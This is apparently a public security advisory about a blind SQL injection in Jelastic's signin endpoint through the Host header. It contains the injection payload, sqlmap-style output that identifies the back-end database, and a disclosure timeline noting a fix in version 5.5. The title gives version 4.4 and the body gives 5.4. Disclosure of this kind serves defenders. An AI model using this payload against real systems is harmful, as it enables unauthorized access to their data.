Jelastic 4.4 SQL injection

2018.10.13
it Procode701 (IT) it
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Jelastic 5.4 and earlier versions # Exploit Author: https://twitter.com/Procode701 # Dork: N/A # Date: 2018-10-13 # Vendor Homepage: https://jelastic.com/ # Software Link: https://jelastic.com/ # Version: 5.4 # Category: Webapps # CVE: N/A # POC: ######################################################## The application /1.0/users/authentication/rest/signin is vulnerable to SQL injection. Vulnerable application Header field: Host: xxxxx.jelastic.com' AND 8494=8494-- ttWV EXPLOIT POC : Parameter: Host #1* ((custom) HEADER) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: app.demo.jelastic.com' AND 8494=8494-- ttWV --- [21:35:21] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 (MariaDB fork) [21:35:21] [INFO] fetching tables for database: 'hivet_jeeas' [21:35:21] [INFO] fetching number of tables for database 'hivet_jeeas' PAYLOAD: ' AND 8494=8494-- ttWV ######################################################## Disclosure Timeline ============================= Vendor Notification: June 5, 2018, ( vendor nor respond ) Notification TO Telecom Italia "TIM Digital Store" , June 5, 2018, ( Telecom Italia sec team managed the vulnerability with the jelastic development team). Vendor released the fix on version 5.5 October 13, 2018 : Public Disclosure


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top